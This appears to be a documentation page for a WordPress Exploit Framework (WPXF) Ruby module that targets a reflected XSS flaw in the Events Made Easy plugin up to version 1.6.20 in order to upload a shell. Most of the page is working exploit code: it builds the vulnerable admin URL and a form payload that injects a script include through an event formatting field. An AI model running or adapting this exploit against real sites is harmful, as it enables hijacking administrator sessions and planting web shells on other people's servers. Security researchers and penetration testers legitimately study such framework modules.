class Wpxf::Exploit::EventsMadeEasyReflectedXssShellUpload
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::WordPress::StagedReflectedXss::new
# File lib/wpxf/modules/exploit/xss/reflected/events_made_easy_reflected_xss_shell_upload.rb, line 6 def initialize super update_info( name: 'Events MAde Easy <= 1.6.20 Reflected XSS Shell Upload', author: [ 'Job Diesveld', # Discovery 'rastating' # WPXF module ], references: [ ['WPVDB', '8595'], ['URL', 'https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_events_made_easy_wordpress_plugin.html'] ], date: 'Aug 04 2016' ) register_option( IntegerOption.new( name: 'event_id', desc: 'A valid event ID (can be found in the URL of an event page)', required: true ) ) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/events_made_easy_reflected_xss_shell_upload.rb, line 31 def check check_plugin_version_from_readme('events-made-easy', '1.6.21') end
event_id()
click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/events_made_easy_reflected_xss_shell_upload.rb, line 35 def event_id normalized_option_value('event_id') end
form_fields()
click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/events_made_easy_reflected_xss_shell_upload.rb, line 47 def form_fields { 'event_status' => [1, 2, 5].sample, 'event_contactperson_id' => -1, 'event_seats' => 0, 'price' => 0, 'currency' => 'EUR', 'eme_prop_max_allowed' => Utility::Text.rand_numeric(2), 'eme_prop_min_allowed' => Utility::Text.rand_numeric(1), 'eme_prop_rsvp_discount' => '', 'eme_prop_rsvp_discountgroup' => '', 'rsvp_number_days' => Utility::Text.rand_numeric(1), 'rsvp_number_hours' => Utility::Text.rand_numeric(1), 'eme_prop_rsvp_end_target' => 'start', 'event_name' => Utility::Text.rand_alphanumeric(10), 'event_slug' => Utility::Text.rand_alphanumeric(10), 'localised_recurrence_date' => Time.now.strftime('%d/%m/%Y'), 'recurrence_start_date' => Time.now.strftime('%Y-%m-%d'), 'localised_recurrence_end_date' => Time.now.strftime('%d/%m/%Y'), 'recurrence_end_date' => Time.now.strftime('%Y-%m-%d'), 'recurrence_freq' => ['daily', 'weekly', 'monthly'].sample, 'recurrence_interval' => '', 'recurrence_byweekno' => 1, 'recurrence_byday' => 1, 'localised_event_start_date' => Time.now.strftime('%d/%m/%Y'), 'event_start_date' => Time.now.strftime('%Y-%m-%d'), 'localised_event_end_date' => Time.now.strftime('%d/%m/%Y'), 'event_end_date' => Time.now.strftime('%Y-%m-%d'), 'event_start_time' => Time.now.strftime('%I:%M%p'), 'event_end_time' => Time.now.strftime('%I:%M%p'), 'eme_prop_event_page_title_format_tpl' => 0, 'event_page_title_format' => Utility::Text.rand_alphanumeric(10), 'eme_prop_event_single_event_format_tpl' => 0, 'event_single_event_format' => "<script>#{xss_ascii_encoded_include_script}<\\/script>", 'eme_prop_event_contactperson_email_body_tpl' => 0, 'event_contactperson_email_body' => '', 'eme_prop_event_registration_recorded_ok_html_tpl' => 0, 'event_registration_recorded_ok_html' => '', 'eme_prop_event_respondent_email_body_tpl' => 0, 'event_respondent_email_body' => '', 'eme_prop_event_registration_pending_email_body_tpl' => 0, 'event_registration_pending_email_body' => '', 'eme_prop_event_registration_updated_email_body_tpl' => 0, 'event_registration_updated_email_body' => '', 'eme_prop_event_registration_cancelled_email_body_tpl' => 0, 'event_registration_cancelled_email_body' => Utility::Text.rand_alphanumeric(10), 'eme_prop_event_registration_denied_email_body_tpl' => 0, 'event_registration_denied_email_body' => Utility::Text.rand_alphanumeric(10), 'eme_prop_event_registration_form_format_tpl' => 0, 'event_registration_form_format' => '', 'eme_prop_event_cancel_form_format_tpl' => 0, 'event_cancel_form_format' => '', 'location_name' => Utility::Text.rand_alphanumeric(5), 'location_address' => Utility::Text.rand_alphanumeric(5), 'location_town' => Utility::Text.rand_alphanumeric(5), 'location_latitude' => '', 'location_longitude' => '', 'content' => Utility::Text.rand_alphanumeric(10), 'event_image_url' => '', 'event_image_id' => '', 'event_url' => '', 'event_update_button' => '' } end
initial_script()
click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/events_made_easy_reflected_xss_shell_upload.rb, line 43 def initial_script create_basic_post_script(vulnerable_url, form_fields) end
vulnerable_url()
click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/events_made_easy_reflected_xss_shell_upload.rb, line 39 def vulnerable_url normalize_uri(wordpress_url_admin, "admin.php?page=events-manager&eme_admin_action=update_event&event_id=#{event_id}") end